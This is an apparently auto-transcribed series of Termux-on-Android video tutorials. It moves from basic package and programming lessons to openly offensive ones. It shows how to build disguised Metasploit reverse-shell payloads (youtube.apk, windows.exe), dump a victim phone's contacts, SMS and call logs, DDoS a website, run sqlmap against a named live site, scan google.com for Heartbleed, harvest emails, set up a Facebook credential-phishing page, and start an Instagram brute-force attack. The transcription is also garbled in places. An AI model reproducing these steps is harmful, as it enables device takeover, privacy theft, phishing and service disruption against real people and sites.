And now I am going to click on my Play Store. Here I am writing Termux. Now here you can see the Termux application. Shots related to the Termux terminal. And next, clicking on install, it gets downloading. And next click on open. And now we are in the terminal of Termux application. Here you can see some of the information like Wikipedia. And if you want to install any packages or search any packages, you need to just type pkg search query. Query is related to any package name. And next, installing of packages, you have to type pkg install and a package name. And if you want to upgrade the packages, just type pkg upgrade. And if you want any help from the Termux application, you just type pkg help. So in further videos, we are going to see how to hack the devices, how to do web scanning, and many more things. So that's all in this video. Thank you. In this video, we are going to see what is Termux application and what are its features. Environment app that works directly with the no routing or any set requirements. A minimal based system is package manager, and it is also secured for remote services using the SSH client for OpenSSH. So before going to the further explanation, I am going to tell you what is OpenSSH. OpenSSH is a suite of security related networking level utilizes based on the security shell protocols. Means there are some of the protocols which are carried out through the Termux application. And also OpenSSH helps you to secure network communication methods and provide by security tunnels capabilities. So this is all about OpenSSH. And next, coming to the feature packets that are nano, gripping through the SMS box, base, and also exploitable packages which are available on the Termux are similar to the Linux operating system and also Mac, and installing man pages on your phone and reading them in one session while experimenting with them in another. And also it consists of some of the add-ons like Terminal API, which exists the Android and Chrome hardware features. And the second one is Termux boot. Run a script with your device booting. Means it allows you to boot your Android device. And next one is Termux float. Run a Termux in a floating windows. And next, Termux styling. Termux styling allows you to color schema and powerline ready fonts, customizing the appearance of the Termux terminal. Means you can change your alphabets present in the Termux in the form of stylish way. And next is Termux task, an easy way to call Termux executable form, taskers, and compatibility apps. And at last, Termux wizard. Termux wizard starts a small script table from the home screen. So these are the add-ons and features of Android Termux application. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to see how to install type hacker keyboard. Here you can see the hacker keyboard application and some of to it. And next, clicking on install. Okay, now the hacker's keyboard has been installed. I'm going to click on open. Here you can see the information about the hacker's keyboard. 4 buttons. Now I'm going to click on enable keyboard. It shows that available virtual keyboard. I'm going to select hacker's keyboard. we are going to enable the Hackers keyboard for all the. Next, here you can see the input languages. Select any languages to your Hacker keyboard, and next, now here you can see the another pop-up, that is change keyboard. You can select Gboard or English and English language or Hackers keyboard, and next clicking on get dictionaries, you can see so many dictionaries, French, Germany and many more. So now coming back to my screen, here you can see the Hackers keyboard has been installed, and next I'm going to open up my Termex, and now I'm going to change my keyboard into Hackers keyboard. Now here you can see the Hackers keyboard, which consists of Control, Escape, Alt, Enter button, functions keys, and it is similar to the keyboard which is present on your desktop. And next I'm going to click on function. Here you can see all the functions keys from F1 to F12, and also home and page up, page down, insert, delete, and the 4 arrow keys. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn some of the top 10 commands that can be used in the Termex. Now, I'm going to open up my Termex. I have already updated my packets by typing apt update, and now I'm going to type apt install sl. Sl is a command used for fun. It is a simple small program, and now it gets installed. I'm going to wait for a while. Now it's installed, and next I'm going to type SL. Here comes a small train. So we came to know that the SL program consists of a small train which can move from one end to the another. If you want to check any factors of a number, you can just type factor and a number. Now here I'm going to type factor 100, and now it's showing the factors of 100. Those are 2, 2, 5, 5, and next typing factors of 200. Those are 2, 2, 2, 5, 5. So this is how we are going to get the factors of the numbers. So my next command is fish. I am going to install the fish by typing apt install fish. It gets installed, and now typing fish. It says that welcome to fish, the friendly interactive shell. Here you can get the shell command terminal. You can access any folder, any file through the fishing. And my next command is figlet. It's a character made up of ordinary string characters. Okay, here it gets installed, and now I'm going to type figlet. After typing figlet, you have to type any name. I'm going to type here Danny Jack. Here you can see the Danny Jack in the larger character. It's pretty cool to see the names in the larger, which is used to display the horizontal characters for 2-3 seconds on your Android phone. Now I am going to install cmatrix by typing apt install cmatrix. After getting installed, I am going to type here cmatrix. Now on my Android phone, it's going to display for 2-3 seconds. Okay, now it's gone. And my next command is twiled. I'm going to type here apt install twiled. Twiled is a simple program which will display the character in the stylish format and also colorful format. Okay, now it gets installed. Now I'm typing twiled. After typing the name, I'm going to type here Danny. Okay, now here you can see the Danny in the stylish format, and if you want to add a color, further I'm going to type twiled F MONO12, capital letter F, Gay, Danny. Made using the toil. And my next command is W3M. W3M is a command which is going. I'm going to show you Google search engine. .com. Here you can see the Google search engine. You can search anything here by just typing on your keyboard, but in the Termex it doesn't show any graphical formats. So that's how W3M command works. All of us know the if config displays the IP address of your LAN or WAN. Here you can see my IP address and other OSs. So there are a few more commands which I have given in the description. You can try it yourself and have fun. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to send a SMS using Termex. Before sending the SMS, you need to add two things. First one is Termex API. Termex API is an applications. And next, second one is apt install Termex API. This I'm going to do it later. Coming back to now typing apt update. So why I'm doing this update again and again is if there is any package has been updated, it gets installed on my Termex. And next typing apt install Termex API. Similarly, this also gets updated. And next, sending SMS to your phone or your friend's phone. And now I'm going to type a simple command, that is Termex SMS send. Here you need to add your number and next what the message you are going to send. Here I'm typing my number and hello world. Then pressing enter. Okay, now the SMS has been sent. I'm going to wait for a while. I'm going to get a notification of an SMS. So here we go. To send a SMS to your phone number or your friend's phone number. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn how to make a call API application on your Android device and also how to send a SMS. Similarly, in this video, you're going to learn how to make a call using Termex. Now, clicking on my Termex application, typing apt update. Now, all the packages have been updated. And next, typing apt install Termex API. Then pressing enter. And next, making call to your phone number or your friend's phone number. Now, typing a simple command line, that is Termex telephone call. And next I'm going to enter my number and pressing enter. Okay, now it's asking me which SIM you want to select to make a call. I'm going to select SIM 1. Here you can see the call is getting connected. So this is how I'm going to make a call using Termex. So similarly, you can try in your phone by installing this application and typing these commands. So that's all this video. Thank you. We're going to see how to create a storage in Termex. There are three main storages: app private storage, shared internal storage, and external storage. These are the three main storages which are used in the Android phone. If you want to create a storage in Termex, you need to type Termex setup storage. It will give the permission to share the folders by creating a storage itself. So basically when you use Termex, it doesn't show any storages or any folder present in your internal storage, but it will only show the home and user directories. And if from any site or GitHub link, it will be stored in the home directory. And now I'm going to open my Termex and type in the home directory, and now typing cd ... then press enter. It will get back from the rooted folders. So now I'm going to type Termex setup storage and press enter. By typing this command, you will get the storage folder. After that, you can see the shared folder. By that, you can access any other files present in your internal storage. So now, getting back to my command, then I'm going to type ls command. Again, you can see here the home and user directory, and next entering into my home directory by typing cd home, and then again ls command, enter. That storage command. Okay, now getting into storage folder by typing cd storage, and again shared. As I said, shared folder contains all the files and folders of the internal storage. And now I'm going to type cd shared. Now here you can see the folders present in my internal storage. Here I'm going to create a directory by typing mkdir jack. So I have created a directory. Let me check in my internal storage. Yeah, here I get it. You can see the name of the folder jack. And now I'm going to check in my internal storage. So coming back to my Termex, that's how you can create a folder and store some of the files and get them into the Termex terminal. So that's all in this video. Thank you.
Hi, welcome back to my video. In this video, you are going to learn how to create a simple C program and how to execute it. Before going to write a C program, we need to install some of the packages. First, I am going to install Clang. Clang is a front end for the programming languages like C, C++, OpenMP, and also for Python. And now I am going to type apt install Clang. Okay, now Clang gets installed, and next I'm going to install nano. So now typing apt install nano. Nano is a command line text editor that can be run for a command prompt via Telnet or SSH session. It's going to allow you to create a text file or to write any program. Okay, this gets installed. Okay, now it's time to write a simple C program on your Android Termex. So now I'm going to type nano new.c. New.c is a file name. So here comes an nano text editor, and now typing /include stdio.h int main opening and closing brackets inverted comma. In that I'm going to type hello world. putting semicolon. Okay, now I'm going to press Ctrl O to save the file, pressing enter, and next Ctrl Termx. I'm going to compile this program by typing clang new.c. Okay, typing ./a.out. Here you can see the hello world. So this is how you create a simple C program on your Android Termx. So you can make use of Android Termx to write any program like C, C++, HTML or any text by installing these packets. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to create a simple C++ program and how to execute it. In the last video, you saw how to install the Nano and clang packages and also how to execute a simple C program. So now, in this video, you are going to see how to execute a simple C++ program. So basically, C++ introduces object-oriented programming language feature to C. It offers classes which provide the 4 features commonly present in OOPS, abstract, encapsulation, inheritance. So now it's time to create a simple C++ program. I'm going to just type nano new.cpp. CPP is an inbuilt extension of C++ program. So now it's going to open up the editor. System.h consists of header files which are used in C++ program, and next typing int main, opening and closing flower bracket, then pressing enter, std cout, and next hello I'm cpt, std and l. So this is a small C++ program. I'm going to save the file by typing Ctrl plus O and then pressing enter, and next to exit editor typing Ctrl X, enter. Now coming back to my Termx, I'm going to compile my program by typing clang new.cpp. I'm going to use plus because it's a CPP program. Okay, it has successfully compiled, and next typing ./a.out. It's an output file of an C++ program. Okay, here comes the hello I am cpt. So this is how you can create a simple C++ program in your Android Termx. You can make use of this and create bigger programs. Thank you.
Hi, welcome back to my video. In this video, you're going to learn how to create a Python program and how to execute it. To create a Python program, we need to install some of the packages related to the Python background. So you have seen many hackers use Python programming to create hacking tools. So now I'm going to install Python by typing apt install python and then pressing enter. Okay, now all the packages have been installed. New.py. Okay, now here we are in the text editor. Now typing print, opening and closing brackets. In that I'm going to write hello, this is a Python program, ending up the semicolon. Next I equal to 100, j equal to 200, print I plus j, So now I'm going to press Ctrl O to save the files and then Ctrl X to exit from the file. Okay, now I'm going to compile the program by typing python new.py. Okay, now here you can see the output, that is hello. This is a Python program and the addition of two variables. So that's how we are going to create a Python program in our Termux. That's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to install Metasploit framework on Termux. So before going to that, I am going to explain what is Metasploit framework. Metasploit framework is a tool, or you can call it as a software platform for developing, testing, and executing exploits. It can be used for creating a security testing, and it is also known as penetration testing system. So now I'm going to open up my Termux and typing apt install curl. Curl is a tool that transfers data from or to a server using one of the protocols like HTTP, HTTPS, FTP, and many more. I have already installed on my Termux, and next typing pkg upgrade. So this also I have already installed on my Termux. So I suggest you guys, before doing any attacks, you should update your packages. So next, installing Metasploit framework on my Termux. I have given the URL link in the description. You can just copy it from there. And now I'm going to paste my URL. Then press enter. Now it gets downloaded. And next typing ls command. Access permission by typing chmod 777 metasploit.sh, and next running the Metasploit file by typing, then pressing enter. Now all the packages get installed. I'm going to wait for a while. Okay, now you can see all the packages have been installed, and now I'm going to type ls command. Here you can see the Metasploit framework and metasploit.sh file, and next I'm going to type cd Metasploit framework and next typing ls command. Okay, now here you can see some of the files and folders related to the Metasploit framework, and also you can see the MSF console and MSF VMO, which are used to create a payload and exploit the other devices. And now it's time to launch the Metasploit framework by typing /MSF console. And now the Metasploit framework gets loaded. Okay, now here you can see the Metasploit framework. In the further video, I am going to show you how to hack and PCs by using Android Termux. So that's all in this video. Thank you. Hi, welcome to Android phone by using Metasploit framework. Now entering into the folder by typing Metasploit framework and next ls. Here you can see the files and folders, and now I'm going to create a payload by typing /reverse TCP. Now entering the L host, that is 192.168.1.102, and entering the port number L port 444, that is default, R APK, /SD card /youtube.apk. Okay, now it has created a payload with the name of youtube.apk. I'm going to show you youtube.apk in my file manager. Here I go into my file manager, and now you can see here the youtube.apk file. Okay, now I'm going to send it to my victim device. Console to exploit the Android device of the victim. Okay, here MSF console gets loaded, and now typing use exploit /multi/handler, and next setting up the payload, set payload Android /interpreter/USTCP, and next setting up the lhost by typing set lhost 192.168.1.102 and lport 444. At last typing exploit. Now I'm going to install youtube.apk file in the victim device. Here you can see the installation. Okay, the app gets installed. And now coming back to my Termex. Okay, here I got the interpreter session. You can see it here. And now I'm typing system info. Okay, here I get the details of victim device, that is Android phone. So that's how we are going to hack the Android phone by using Metasploit framework in the Android Termex. That's all in this video. Thank you.
In this video, you are going to learn how to access directories and also how to say the content of victim Android phone. So in the previous video, you saw how to create a payload and also seen the information of victim phone. And now I am in my terminal. Here you can see the system information. And next I am going to type pwd So now here showing my payload where it is present, and next I am going to show you the directories present in the victim phone. Now entering into the SD card by typing cd/SD card, then pressing enter, next typing ls command. Here you can see all the directories present in the victim phone. You can see shared directory, themes and some more directories. Next, if you want to create any directory in the victim phone, you should make use of mkdir command. And now I am going to create a directory by typing mkdir sac, then pressing enter, then once again typing ls command. So here you can see the sac directory which I have created just now. And next I am going to show you how to remove the directory by typing rm sac and then again typing ls command. Here you can see that the directory has been deleted. Delete a directory in the victim phone. Next I am going to show you how to copy the contacts of victim phone by just typing a simple command dump_contacts, then pressing enter. Now here it shows that the 228 contacts have been saved from the victim phone, and those contacts are saved in the .txt format with a file name. And also you can dump the SMSs and call logs by using same command. If you want to dump the SMSs, just type dump_SMS, and if you want to dump the call logs, just type dump_call log. And next I am going to check whether the victim phone is rooted or not by typing a simple command check root, then pressing enter. So this is how you are going to check the victim phone whether it is rooted or not. Now Here it shows that there are two cameras. Those are 1 back camera, 2 front camera. And now I am going to take a snapshot from the victim phone. Hi, welcome back to my video. In this video, you are going to learn how to hack the Windows PC by using Metasploit on your Android Turn Max. So, in the previous video, you saw how to hack the Android device by using Metasploit on your Android Turn Max. So now, by using Metasploit, I am going to hack my Windows PC. Now, entering into my folder by typing cd Metasploit framework and next ls. So here you can see some of the files and folders which are used to create a payload and also exploit the Windows PC. Now creating a payload by typing /msfvmo p /tcp and entering my L host, that is 192.168.1. Next, setting up the L port, that is default 4444. Next, exe, giving the path to store my exe file /sd card /windows.exe. It's going to create a payload. Okay, now it has created a payload with the name of windows.exe and the file size is 73802 bytes. This is similar how you create a system. Coming back to my screen, going to my file manager, here you can see the windows.exe file, that is payload. Now I am going to send it to my Windows desktop. Here you can see the file on my Windows desktop. So next, opening the new session in my Android Turn Max, typing cd Metasploit framework and next typing ls. Now I am going to load the MSF console by typing ./MSF console. Here I am going to use exploitation models to exploit Windows PC. Okay, now typing use exploit /multi/handler. Next, setting up the payload by typing set payload windows /meterpreter /reverse tcp 192.168.1.1 and setting up the L port 4444. At last, typing exploit. Now I am going to my Windows desktop, double clicking on exe file, that is payload. Coming back to my Android Turn Max, here I got the interpreter session and now I am going to type system info. Here you can see the system information which is showing that is Windows 7 and my PC name. So this is how you are going to hack the Windows PC by using Metasploit in your Android Turn Max. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to find the HTTP enum way back by using for the purpose of replaying during a web assessment. It's just like a finding unlinked or old pages. Next, then typing cd Metasploit framework, then pressing enter and next typing ls command. So here you can see the files and folders present in the MSF framework. So next I'm loading up the MSF console by typing /MSF console. It takes a little bit of time. Okay, now it's loaded up. Next I am going to use auxiliary model by typing use auxiliary /scanner /http /enum underscore wayback. So next checking up the information of model by typing info. So now here you can see the information like domain output file. For the domain we have to add the URL, and for the output file we have to give the file name, and it stores all the URLs present in the website. So next setting up the domain by typing out file sackhack. I'm setting the file name as sackhack. So next at last run, then pressing enter. I'm going to wait for a while for the output. So now here you can see the output information. It says that pulling the URLs from the archive.org, and it has located 4 addresses from sackhack.com and writing URLs to the sackhack. Finally it has created a output file. So now I am going to exit the session by typing Ctrl+C and next typing ls command. Here you can see the file sackhack. Now I am going to open this file by typing nano sackhack.txt. So now here you can see the URLs present in the website, and these are the recently viewed page by the enum users. So that's how you are going to find the URLs stored by archive.org. That's all in this video. Thank you. Hi, welcome back to my video. In the previous video you saw how to find the HTTP enum wayback by using how to find the endpoint mapper scanner, which is an auxiliary model in Metasploit. By using this model we can obtain the information from the mapper service. So here you can see the previous output. Now I am going to select a new session. Once again I am going to enter in the Metasploit framework by typing cd Metasploit framework, next /MSF console. It gets loaded up. So next I am going to use endpoint mapper model by typing use auxiliary /endpoint mapper and getting the information by typing info. So now here you can see the information of model like rhost, rport and threads. Rhost is used for setting the target address. Number of concurrent threads. So now all we need to do is just set up the range of IP address by typing set rhosts and the IP address range, that is 192.168.43.1/24. So now setting up the threads count by typing set threads 255. So at last I'm going to type run. Here you can see that this model can be used for obtaining the information of mapper service. So now here it's showing that connecting. What it's actually doing is it's going to cross check all the IP address and find the exact IP. Here it shows us that some of are not getting connected. We need to wait for a while till it gets connected for the IP address. Okay, now here you can see that it has found the endpoint, that is SACPAC, and its IP address is 192.168.43.17. So that's how we are going to find the endpoint by using endpoint mapper, which is present in the auxiliary model in Metasploit. That's all in this video. Thank you. Hi, welcome back to my video. In the previous video, you saw how to do endpoint mapper, which is an auxiliary model. So now in this video, you are going to learn how to do autopon using Metasploit. So before that, I am going to tell you what is autopon. Using a Java exploit when a flash exploit is called for a simple won't work and might land you behind the bars. The beauty of autopon is that it relieves you of some of the hard work of reconciliation, and autopon will first try to fingerprint the victim's browser, then throw at it whatever exploit it thinks might work on it. Typing cd metasploit framework and next typing ls command. Autopon model by typing use auxiliary /server /browser autopon. Now checking the model information by typing info. See some of the basic information, that is lhost, srv host and srv port. Srv host is an address of a local machine which is connected to the server, and similarly the srv port also. So next I am going to set the lhost and URI path. Now setting up the lhost. So before that I am going to open another session. Here I am going to type ifconfig, checking my IP address, then coming back to my session. Here I am going to set up the lhost by typing set lhost and my IP address. So next setting up the URI path, set URI path, our own malicious server. So next typing run. So now the autopon model starts exploiting. Each one represents a different possible vulnerability in our browser. For finding the vulnerability, it takes little bit of time. If I am a target or a native to the server at my IP address 8080/sackhackon.com. Here you can see the output. It's keep on checking the possible exploitation with the given URI path. So here we get the result after a 20 exploits. Here you can see the link, and now I'm going to copy the link and paste it in my Chrome browser. Here I pasted. Then next coming to my termix. Here it shows the output like an Android, and also it shows the Chrome address. So that's how the Autopon works. That's all in this video. Thank you. Hi, welcome back to my video. In the previous video you saw how to do Autopon, and also you saw how does it works using URI path. So now in this video we are going to learn email harvesting, which is one of the Metasploit model. Out of the many useful auxiliary models, the Metasploit has one among them is search email collector, which searches the email in Google, Bing, Yahoo for the email addresses associated with a particular domain. So now I am going to open up the new session and next typing cd Metasploit framework, then pressing enter, then once again typing ls command. So next loading up the MSF console. So next using up the search email collector module by typing use auxiliary /gather /search email collector, then getting the information of the module by typing info. Here you can see some of the basic information like domain, output to locate the email address, and next output file. A user can give a file name where all the emails can be stored, and so on. The most important part of this is domain name. Next I am going to set up the domain name by typing set domain reddick.com. At last execute by typing run command. So now here you can see it's going on searching on Google, Bing, Yahoo. So another one, and next I am going to use hotmail.com, then again typing run. So now here you can see the some of the email address. In file, then you need to make use of outfile command. Here I am setting the out file with the name of email.txt, and next once again using the run command. Here you can see the emails. These emails will be stored in the email.txt file, and next I am coming out of the session by typing Ctrl C, then typing ls command. So now here you can see the email.txt file. I am going to open it by typing nano email.txt. Here you can see the email list which are present in the email.txt file. So email harvesting can be used by the hackers to carry out a phishing camp against an entire organization. So this is one of the aspects of email, how emails can be misused. Computer users who are unaware of phishing attack can fall victim and up. If a hacker gets control on a single machine inside an organization network, it may open for him the path to access and exploit the entire network of the organization. So that's all about email harvesting. Thank you. Hi, welcome back to my video. In the previous video you saw how to do email harvesting and gather the email information. So now in this video we are with the SSH version scanner. SSH is a widely used application that provides secure remote login. It uses strong cryptography to provide authentication and confidentiality. Now I am going to use the SSH version auxiliary model that can be found in the Metasploit. By using this model, we can determine the target occupied with a vulnerable SSH version. So this may help hackers to get into the web application. So now I am going to type cd metasploit framework, then typing ls command, and next loading up the MSF console by typing /MSF console, and next making use of SSH model by typing use auxiliary scanner ssh version. Now checking out the model information by typing info. Here you can see the information like rhost, rport, setting up the target range, rport which is default, threads, number of concurrent threads, address for setting up the rhost range, and next typing set rhost 192.168.1.1/24. Next setting up the number of threads by typing set threads 100. At last execute by typing exploit. Okay, now here you can see the scanned host, but we did not got any results of the SSH version. And if you want the correct I am giving the IP address as 192.168.1. Then running the exploit command. Here it shows us only one scanned host. And once again I am going to change the IP address, that is 192.168.1.102, again using the exploit command. So now here we got some of the information like 192.168.1.102 is the IP address, and its SSH server version is SSH 2.0, and its open SSH version is 4.7 PI. So that's how we are going to detect the SSH version of the target. That's all in this video. Thank you. Hi, welcome back to my video. In the previous video, you saw how to find the SSH version of a web application. So now in this video, you are going to learn a file transmission protocol where the files and folders can be uploaded to the server and easily accessed by the users, and the FTP ports start from 21 onwards. The FTP version model simply scans a range of IP address and determines the versions of an FTP servers. So here I am going to type cd metasploit framework, and next typing ls command, and next loading up the MSF console by typing /MSF console, and next I am going to use FTP model for scanning the FTP version. Scanner /FTP version, and checking out the information of an FTP. Here you can see some of the information like FTP pass, FTP user, and rhosts, rport which starts from port 21, at last threads. Now to set up the model, I need to just enter the host and threads. So now I am going to type set host and the IP address, that is 192. Setting up the host, because in the previous video you saw the SS version of the same host. On that basis I am using the similar host. So next, setting up the threads by typing set threads 255. At last, typing that is 220 pro FTP PD 1.3.1 and the server is VBox. So next, if you find many hosts present in your network, then better you make use of this method. Here I am typing hosts and setting up the IP address as 192.168.1.100/24, and again I am using run command. Here shows us the only one FTP banner, similarly which we got previous, so we did not find any other FTP version. That's how we are going to find the FTP version of a particular host. Thank you. Hi, welcome back to my video. In the previous video you saw how to find the FTP version of an host. So now in this video we are going to learn a simple exploit for getting the OpenSSL. Before that I am going to tell you what is SSL. SSL is a secured sockets layer in a computer network protocol. It is used for securing the connection between the network applications. So now coming to the OpenSSL. OpenSSL is a software library for over a computer networks against heavy drops. So coming to the Metasploit model, the hard-built vulnerability enables a hacker to track the OpenSSL by sending a single bit of data while telling the server it sent 64 KB of data, and the server sends back the same 64 KB of data to be checked and echo back, and again the server will respond with the 64 KB of random data from its memory. So that's how the you can see the output of previous video. Now here I am directly loading up the MSF console by typing /MSF console, and next I am going to use OpenSSL hard-built model by typing use auxiliary /scanner/SSL/OpenSSL_hardbuild. So let's check the model information by typing info information like name, module, and also the available action present in this module. One is host. Here I am opening another session. Now I am going to type ping google.com. Now here you can see the IP address. I am just going to copy it, and next coming back to my session, here I am typing set host and pasting the IP address, and next typing set verbose true. Verbose, it gives more information about the applications which we have pinged. At last typing run. Here I am attacking on google.com. So finally we get some of the information about the Google. So that's how we are going to find the OpenSSL of any application or any website.
Hi, welcome back to my video. In this video, you're going to learn what is nmapping and how to check the status of target machine. Before going to check the status of target machine, I'm going to explain you what is nmap. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network and what operating system they are running and what type of packets, filters, firewalls are in use. So now coming back to my termex, now I am going to check the status of target machine. Most of the attackers try to gather the information of any server by using nmap. So now I am going to install nmap by typing apt install nmap. It's going to take some time for installation, but now I have already installed and now I am pressing enter. Okay, now here you can see some options and commands related to the nmap. By using these options, I am going to check the status of server. Next I am typing nmap s capital P. SP is a ping scanning. Next I am going to enter my IP address 192.168.1.1/24. This can type list the hosts within the specified range that responds to the ping. It allows you to detect which computers are online rather than which ports are open. So this is how attacker try to check the status of targeted machine. That's all in this video. Thank you. Hi, in this video you are going to learn how to check the ports of target machine. In the previous video you saw how to check the status of target machine and also what is nmapping. Now in this video you are going to check the ports of target machine by nmapping. So after checking the status of nmapping, the attackers try to check the information of the ports, means which all our ports can be used for attacking the server. Coming to the ports, there are 6 port states recognized by the nmap. First one is open. Security-minded people know that each open port is an canvas for attack. Attackers and pen testers want to exploit the open ports. So next one is close. Closed port is accessible but there is no application listening on it. They can be helpful in showing that a host is up on an IP address. And the next one is filtered. The filtering could be from a detected firewall, routing rules, or and the next one is unfiltered. The unfiltered state means that a port is accessible but nmap is unable to determine whether it is an open port or closed port. And the next one is open filtered. Nmap places ports in the state when it is unable to determine for scanning types in which open ports gives no response. And the last port is closed filtered. This state is used when the nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scanning. So now coming to my termex, here I am going to type nmap and then I am going to enter my IP address, that is 192.168.1.100. Then pressing enter. Now here you can see the open ports of my IP address. Ports, status of the ports, services. So in this you can see all the TCP ports are open. TCP is a transmission control protocol. You can see the services and also you can see RTSP service, that is RTSP service, some typically HTTP request like the options requesting. And next I am going to type nmap scam.nmap.org and then pressing enter. and here it shows all the services and ports present in the nweb.org, and also you can see here 993 ports are closed in this. Here you can see FTP ports, SMTP ports, HTTP, and few more. You can see here HTTP ports is open and its port number is 21. We use FTP port to upload the files to the server, and also you can see HTTP ports port and its port number is 80 and filter SMTP. So this is how the attacker checks the ports before doing any attacks. Make sure that your web application or your server can be secured by this type of ports. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to see how to do DDoS attack in Termux. Before that, I am going to explain you what is DDoS attack. DDoS attack is a distributed denial of service, occurs when the multiple systems flood the bandwidth or a resource of a targeted system using one or more web servers. Such an attack is often the result of multiple compressed systems. So once the site is down, the attackers demands for the money in exchange for stopping the attacks. Now I am going to click on my Termux. I am going to update the packages by typing apt update and next typing git clone. To do DDoS attack, so here is the hammer. Hammer is a Python file which is used for DDoS attack. I am going to just copy the link. Now coming back to my Termux, okay, pasting typing ls. So here is the hammer folder. Next I am going to enter in the hammer folder by typing cd hammer and pressing enter and next typing ls command. Okay, now here you can see the hammer.py file. I am going to get the access permission by typing chmod +x hammer.py and next typing python hammer.py. Now here you can see some of the Now I'm going to show you how to do DDoS attack on the websites. And next I'm typing python hammer.py. S for server IP address. Now I'm going to use multi-screen in my phone. Here I'm going to open up my website. Okay, now here you can see the website gets loaded continuously. Screen you can see the packet sending continuously to the website. I'm trying to refresh the website. It's not opening. So that's all in this video. That's how you can do DDoS attack on any websites. You can make the website down. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to do I'm going to explain you what is SQL map. SQL map is an open source pen testing tool that automates the process of detecting and exploiting SQL injection flaws and also takeover of database server, and it supports to enumeration users, password hash, tables and database. So most of the hackers use SQL map to find the passwords of the different websites. So before doing SQL mapping, we need to install some of the packages. So now I'm typing pkg install python. So which I have already installed the packets. And next getting the GitHub link. Here is the GitHub SQL and I'm just going to copy the link. Now coming back to my Termux, I'm going to paste it here, then press enter. see the SQL map folder. Next typing cd SQL map, then ls. Okay, now here you can see the SQL map.py file, and next I'm going to type python to SQL map.py. Now it's asking me to enter some of the options like D to find the directory, U to add a URL, L login files, M bulk files, R request files, C config file, X site mp file. So now I'm going to add a website link, and now typing python to SQL map.py, U for entering the URL. I'm going to enter the URL http://www.biblehistory.com/subcat.py id equal to 1. Next dbs to find the database. Next I'm going to press enter, and now the site mapping starts. Okay, let me check what I'm going to get. I'm going to wait for a while. Okay, now here it's asking me one question. Do you want to include all tests for MySQL? Press S. Okay, now I'm going to press Y, then enter, then again mapping starts. HTTP requests and also some of the contents tables available in the database. So the SQL map has been stopped. Okay, now I'm scrolling down. Here you can see table contents related to the website. So that's how we are going to find the database of the websites by doing SQL mapping. So by using SQL mapping, you can find vulnerabilities present in the websites. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn how to find a location of website. Is IP geolocation. IP-based geolocation is mapping of an IP address or MAC address to the real-world geographic location of an internet-connected computing or mobile device. So basically, it's going to find your server location in the form of geographical. Now I'm going to click on my Termex, and first and foremost I'm going to type Python. Why I am doing this? Because the IP geolocation file is written in Python programming language. I have already installed Python, and next to find the IP geolocation we need to download the file from GitHub. Okay, now here you can see the GitHub link. It in my Termex. So here I come back to my Termex and typing git clone and pasting the URL. Now pressing enter. Okay, now it gets downloaded, and next typing ls command. So here you can see the IP geolocation folder, and next I'm going to type cd IP geolocation, press enter, and now I'm in the folder of IP geolocation. So before going to run the IP geolocation Python file, I need some of the requirements to be installed. So here you can see the requirement file, which has the extension of .txt, and now I'm going to type pip install r requirements.txt, then pressing enter. Okay, all the requirements have been installed successfully, and next typing python IP geolocation.py. Now pressing enter. Here it's showing the help commands that can be used for finding the location, M for finding your own geolocation, target IP address if domain, and few more are there. So now I'm going to check my geolocation by typing python ipgeolocation.py m, then pressing enter. Geolocation of my MAC address. Now here you can see the information of my MAC address. Next I'm going to find the location of website by typing python ipgeolocation.py t targeted website. I'm going to enter www.facebook.com. I'm going to wait for a while. Okay, now here you get the geolocation of Facebook. Here you can see the details. So that's how we can find the IP geolocation of website or any other domain by running ipgeolocation.py file. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to do web scanning. Most of the people do web scanning to find the vulnerabilities present in the website. So similarly, we are going to do web scanning by using Termux. Now clicking on my Termux, and now I am going to type pkg install php. So why I am installing PHP package is, so most of the web applications are written in PHP language. And next I'm going to GitHub. Here you can see the tool name Redhawk. Next I'm going to copy the link, coming back to my Termux, and here I'm going to type get clone, pasting the URL, then pressing enter. Okay, now it gets downloaded, and then typing ls command. Here you can see the folder with the name of Redhawk, and now I'm going to enter into the folder by typing cd Redhawk, then typing ls command. Here you can see some of the files. By using these files, I'm going to do web scanning. And next here I'm typing php rhawk.php. Okay, now here you can see some of the information about Redhawk. Here you can see some of the options which are used to do web scanning. Options like who is looking up, geo IP look, graph banner, DNS lookup, subnet calculator, nmap ports, subdomain scanner, and many more. So now web scanning. And next I get the information of my website, the domain name, registered domain ID, updated, creation date, and many more information. So that's how we are going to do web scanning using the Redhawk tool in the Termux. That's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to do phishing by using Termux. Before that, I am going to explain you what is phishing. Phishing is an attempt to obtain the sensitive information such as username, passwords, and credit card details, and it's often used for malicious on Termux. So before going to the phishing attack, I will install some of the packages by typing apt, pressing enter. Now all the packages are updated. Now coming to my GitHub, so here you can see the tool that is Vman. So Vman is a HTTP server used for phishing and also which is written in the Python programming language. And now copying the link and then going back to my Termux, I'm going to paste it here, then press enter. Okay, it gets downloaded. And now typing ls command. Here you can see the file that is vman.py, and now I'm going to type python to vman.py, then pressing enter. Now here you can see the vman has been loaded successfully, and now it's time to do for phishing. And now I'm going to set up the URL by typing URL http://facebook.com. Similarly, I'm going to set up HTTPS by typing URL https://facebook.com, and next setting up the action URL, that is http://facebook.com. At last I'm going to type run and then press enter. Now we'll get the link, that is http:// and now you just need to send this link to the victim. So now I don't have any victim. I'm just going to copy this link and paste in my browser. Okay, now I'm going to paste in my browser. Okay, now here you can see the Facebook page has been loaded. But whatever the URL is there, it's connected to my server. And now it's time to enter my email ID and password. I'm going to enter my email ID and now entering password and then pressing login. Now let me come back to my Termux. Okay, now I'm going to search my email ID and password. The email ID and password which I have entered in the Facebook phishing page or any other things by doing phishing. That's all in this video. Thank you. Hi, welcome back to my video. In this video we're going to learn how to do brute force attack with Instagram. Before that, I'm going to explain you what is brute force attack. Brute force attack is a trial and error method used to obtain information such as username, password, or personal identification number, that is PIN. It is used to generate a large number of 